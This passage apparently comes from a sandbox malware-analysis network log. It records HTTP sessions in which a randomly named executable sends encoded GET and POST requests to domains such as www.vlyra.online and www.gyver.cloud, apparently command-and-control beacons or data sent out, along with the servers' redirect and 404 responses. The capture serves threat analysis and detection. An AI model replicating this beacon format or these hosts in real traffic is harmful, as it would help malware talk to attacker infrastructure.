Aug 27, 2024 17:50:16.777158022 CEST	7734	OUT	Data Raw: 42 64 72 6b 33 45 35 38 36 7a 36 6f 35 54 6c 58 30 46 6e 78 7a 57 43 74 35 76 6e 34 35 65 43 4e 44 78 76 42 45 53 52 64 68 62 4e 2b 32 7a 66 2f 66 2f 70 34 70 7a 4e 6c 2b 74 67 70 66 70 77 52 31 39 54 45 4f 2f 30 69 50 2b 32 6b 52 69 39 6d 4d 6e Data Ascii: Bdrk3E586z6o5TlX0FnxzWCt5vn45eCNDxvBESRdhbN+2zf/f/p4pzNl+tgpfpwR19TEO/0iP+2kRi9mMn4ER2tCEDA/L7g/hydgGLpiLOOt4wM5F4zeZNHiCWvhpZwsL59sR5JZS3IqNz49Kz3+EFbNhKsUH/B+tnTvkvCAWMO0+QjgvAnCfCIq6xbhL1P2api3X/ZK3MlvUhWBeRRKNrk80LE+nth0tDA0oRGtwJEkOg4lbK6
Aug 27, 2024 17:50:16.777499914 CEST	10312	OUT	Data Raw: 4e 58 52 2b 47 48 61 70 6b 65 34 53 43 2b 70 63 6d 6a 58 42 5a 4f 64 54 74 58 48 75 4b 34 4d 55 43 55 68 48 72 38 56 48 4c 4f 70 49 6b 4e 41 55 6e 34 66 78 45 6c 41 77 5a 78 66 66 66 53 79 72 62 51 57 5a 53 56 30 55 6a 35 7a 61 7a 74 30 45 69 6e Data Ascii: NXR+GHapke4SC+pcmjXBZOdTtXHuK4MUCUhHr8VHLOpIkNAUn4fxElAwZxfffSyrbQWZSV0Uj5zazt0EinQicANcb03zvacBr0gdspASRMnS2zX08NgHyi8ZokBYengpBgGrLtFs8mXxV4d0/cpQAY7WDldk3Al06gPxa1qF/tqxkTtRH1e/WtHUmB59gkb9/kmawq1QOM/apI+XThcN39mCwC1X0lk63ismMrQpRYdSM+sc4EF
Aug 27, 2024 17:50:16.878113031 CEST	1289	OUT	Data Raw: 53 4e 4e 6e 4e 4e 57 62 44 6d 30 68 66 4a 73 37 51 75 53 62 4f 45 30 65 77 46 37 4c 65 6f 70 6d 55 41 64 63 47 36 67 30 78 52 30 59 4c 52 4e 71 52 44 61 59 6f 48 57 74 71 61 70 6a 79 75 72 58 52 58 52 35 33 35 41 38 71 63 4c 68 4f 4e 71 58 4e 7a Data Ascii: SNNnNNWbDm0hfJs7QuSbOE0ewF7LeopmUAdcG6g0xR0YLRNqRDaYoHWtqapjyurXRXR535A8qcLhONqXNzaVP9MuIwEpuyvN8ntT9YPJZCFKsI/3eVyWI+tdE1zOzaochDNnTEIlaROxvyO+4Ol6Va1y2Egvxai0ClwZJVibPgLSSGFcbuwQjdRMSsk0mD2FRJ8M5OOLsOVLHmsbOKUcvlDUS23MEQrZPYC+tgxgF2fqQqZOgk6
Aug 27, 2024 17:50:16.878160954 CEST	1289	OUT	Data Raw: 77 41 56 44 35 51 70 61 4e 39 62 4f 4e 63 75 48 54 4d 69 72 7a 43 6d 62 41 57 77 50 5a 74 58 76 49 76 7a 56 6f 30 64 66 67 76 2b 75 55 4c 5a 62 39 49 67 71 45 66 48 39 77 70 6a 72 52 78 71 4a 32 32 4e 6a 78 50 6c 4a 76 44 65 6d 4f 64 46 30 63 37 Data Ascii: wAVD5QpaN9bONcuHTMirzCmbAWwPZtXvIvzVo0dfgv+uULZb9IgqEfH9wpjrRxqJ22NjxPlJvDemOdF0c729nFcFSWvsOMwwd7nd77TWWEjKLts96qEywDOKj0rctFFtVWmYjZhYvyglhOnO4ZwvajmUDol45ko7m8fwNS3HSLMsgAhx4d2Trv6wLwsqGEj2WUH5g2Z78hQZMrHRWLE9HSUGkoxCnXABxAR5v0S7QamRnyav1we
Aug 27, 2024 17:50:16.878212929 CEST	2578	OUT	Data Raw: 5a 55 2f 56 49 37 54 76 5a 46 68 77 72 79 69 65 51 4f 42 32 6c 6a 71 59 65 4d 47 73 77 55 6e 74 61 36 46 66 47 39 42 6c 76 55 71 4a 52 4f 62 32 6e 71 33 72 36 54 68 69 78 6e 4b 54 34 61 6a 4a 76 6f 4a 53 6d 47 65 43 68 4a 34 56 42 57 2f 59 65 6f Data Ascii: ZU/VI7TvZFhwryieQOB2ljqYeMGswUnta6FfG9BlvUqJROb2nq3r6ThixnKT4ajJvoJSmGeChJ4VBW/YeoS3FGx8eJo6PNFw6tGG5Zyf/meMQjs7f1NCpGKxQr9FOG/UrOwUkSdamY9yvYmsZa545uJXlj9u1Bdb3CjuA1ggI8fo4jeX3pPwwigzHe72AXABzH0zVkwMtVZy+02yQQgQm5v6ZvilqAXXHBVDoSgl191Wa0kzJxu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.11.20	49859	76.223.67.189	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:19.325340033 CEST	524	OUT	GET /7arp/?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.gyver.cloud Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:50:19.428704023 CEST	397	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 27 Aug 2024 15:50:19 GMT Content-Type: text/html Content-Length: 257 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 76 4c 4c 4c 62 4f 68 3d 64 66 79 38 37 61 66 54 43 35 35 59 56 76 7a 53 37 53 31 6a 77 4c 67 63 62 69 35 77 33 4a 48 7a 6a 61 76 61 78 44 51 61 31 39 64 42 30 33 6a 51 73 6b 59 43 41 38 72 2f 37 61 6e 42 42 2b 76 6f 75 54 2b 56 35 61 78 2b 58 6a 47 6b 75 52 48 73 36 75 73 34 42 63 42 46 51 66 58 4b 64 7a 4a 37 6a 31 54 6a 38 5a 47 4d 37 4a 6e 34 59 65 6c 45 46 36 46 31 35 66 51 3d 26 37 52 42 3d 36 36 6e 50 79 4c 47 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AvLLLbOh=dfy87afTC55YVvzS7S1jwLgcbi5w3JHzjavaxDQa19dB03jQskYCA8r/7anBB+vouT+V5ax+XjGkuRHs6us4BcBFQfXKdzJ7j1Tj8ZGM7Jn4YelEF6F15fQ=&7RB=66nPyLG8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.11.20	49860	203.161.42.73	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:24.631759882 CEST	788	OUT	POST /evtw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vlyra.online Origin: http://www.vlyra.online Referer: http://www.vlyra.online/evtw/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 5a 4c 2b 73 41 33 4a 65 76 79 76 67 6f 78 66 49 36 51 62 73 44 34 56 59 30 5a 75 52 73 32 67 6e 6f 47 38 74 62 53 77 4e 69 44 64 53 72 4b 69 68 62 62 31 34 72 65 47 63 76 72 39 34 62 45 72 5a 53 32 6f 6c 59 7a 31 61 79 41 58 4d 6a 66 74 6c 48 56 57 66 74 6a 73 78 79 59 57 56 38 2f 66 79 57 67 71 65 41 45 38 7a 2f 77 73 41 6c 66 77 6c 67 51 39 77 47 57 7a 6e 73 6a 47 50 7a 59 79 58 6c 49 71 38 35 62 36 4b 34 4f 47 50 64 4b 6b 68 41 48 61 6e 50 54 2b 74 47 36 73 78 36 4f 54 4e 6e 36 36 51 37 74 74 57 46 31 4c 62 5a 31 2f 6f 79 4e 39 6c 59 67 3d 3d Data Ascii: AvLLLbOh=nOj0c4YacT1DZL+sA3JevyvgoxfI6QbsD4VY0ZuRs2gnoG8tbSwNiDdSrKihbb14reGcvr94bErZS2olYz1ayAXMjftlHVWftjsxyYWV8/fyWgqeAE8z/wsAlfwlgQ9wGWznsjGPzYyXlIq85b6K4OGPdKkhAHanPT+tG6sx6OTNn66Q7ttWF1LbZ1/oyN9lYg==
Aug 27, 2024 17:50:24.823091030 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:50:24 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Aug 27, 2024 17:50:24.823203087 CEST	1289	IN	Data Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
Aug 27, 2024 17:50:24.823314905 CEST	1289	IN	Data Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
Aug 27, 2024 17:50:24.823328018 CEST	1289	IN	Data Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
Aug 27, 2024 17:50:24.823339939 CEST	1289	IN	Data Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
Aug 27, 2024 17:50:24.823390961 CEST	1289	IN	Data Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35 Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
Aug 27, 2024 17:50:24.823535919 CEST	1289	IN	Data Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
Aug 27, 2024 17:50:24.823661089 CEST	1289	IN	Data Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37 Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
Aug 27, 2024 17:50:24.823683977 CEST	1289	IN	Data Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
Aug 27, 2024 17:50:24.823698997 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
Aug 27, 2024 17:50:25.002897978 CEST	1289	IN	Data Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.11.20	49861	203.161.42.73	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:27.332182884 CEST	1128	OUT	POST /evtw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vlyra.online Origin: http://www.vlyra.online Referer: http://www.vlyra.online/evtw/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 59 76 36 73 50 77 6c 65 6a 43 76 6a 6b 52 66 49 78 77 62 6f 44 34 70 59 30 64 32 42 73 46 45 6e 72 6e 4d 74 61 51 55 4e 68 44 64 53 79 36 69 67 56 37 31 6e 72 65 4c 72 76 71 42 34 62 41 44 5a 44 56 67 6c 4d 54 31 64 71 77 58 4e 6b 66 73 69 57 46 57 76 74 69 51 48 79 61 71 56 39 50 7a 79 58 6c 65 65 4b 78 49 30 70 67 73 47 30 50 77 6d 31 67 39 58 47 57 2b 55 73 6e 43 31 7a 75 61 58 6c 72 53 38 72 4c 36 4c 74 4f 48 48 66 4b 6c 4d 52 69 79 75 45 52 65 36 41 39 55 34 31 72 47 30 6d 72 71 53 33 4f 52 62 54 46 71 67 56 30 79 2f 33 74 4d 64 4e 4d 4e 6c 43 5a 4e 45 32 32 63 4b 39 71 50 69 73 62 6b 4e 73 5a 39 62 77 6e 4c 51 4a 4d 32 4c 65 4e 63 34 53 31 55 2b 42 59 7a 4d 47 4c 53 32 72 38 47 6b 75 6d 68 43 30 52 58 6c 33 54 48 32 71 42 52 47 47 50 78 6e 66 35 2f 53 65 44 7a 53 6f 49 57 4e 38 35 57 34 4f 66 49 56 75 38 6f 56 61 74 33 6f 36 47 45 73 33 4f 53 56 71 64 65 72 35 37 77 55 4b 4c 58 69 2b 4c 4d 58 4d 6a 54 63 74 75 7a 42 37 6c 35 30 6d [TRUNCATED] Data Ascii: AvLLLbOh=nOj0c4YacT1DYv6sPwlejCvjkRfIxwboD4pY0d2BsFEnrnMtaQUNhDdSy6igV71nreLrvqB4bADZDVglMT1dqwXNkfsiWFWvtiQHyaqV9PzyXleeKxI0pgsG0Pwm1g9XGW+UsnC1zuaXlrS8rL6LtOHHfKlMRiyuERe6A9U41rG0mrqS3ORbTFqgV0y/3tMdNMNlCZNE22cK9qPisbkNsZ9bwnLQJM2LeNc4S1U+BYzMGLS2r8GkumhC0RXl3TH2qBRGGPxnf5/SeDzSoIWN85W4OfIVu8oVat3o6GEs3OSVqder57wUKLXi+LMXMjTctuzB7l50mJXpIPXx+NoPpdKKmYnXOzBHPFoIGPj7xkimuoHzUy7Ho3tFDeepRmSPuUpbt7VbKn8Ogd6bnOa0ndxaLQqBDmfVz/kEkyniNiupr6Ev8NZDMqL+Gd14NM+me2buDTZzNccPMjcbJixQN1oMSvPMRSPf02KJ56gOjfKJYZCIuORQ0k5+vmCh7VnBePXJEMhfVWqqaCXg9t/dlJg=
Aug 27, 2024 17:50:27.506719112 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:50:27 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Aug 27, 2024 17:50:27.508965015 CEST	1289	IN	Data Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
Aug 27, 2024 17:50:27.509056091 CEST	1289	IN	Data Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
Aug 27, 2024 17:50:27.509068966 CEST	1289	IN	Data Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
Aug 27, 2024 17:50:27.509306908 CEST	1289	IN	Data Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
Aug 27, 2024 17:50:27.509334087 CEST	1289	IN	Data Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35 Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
Aug 27, 2024 17:50:27.509387016 CEST	1289	IN	Data Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
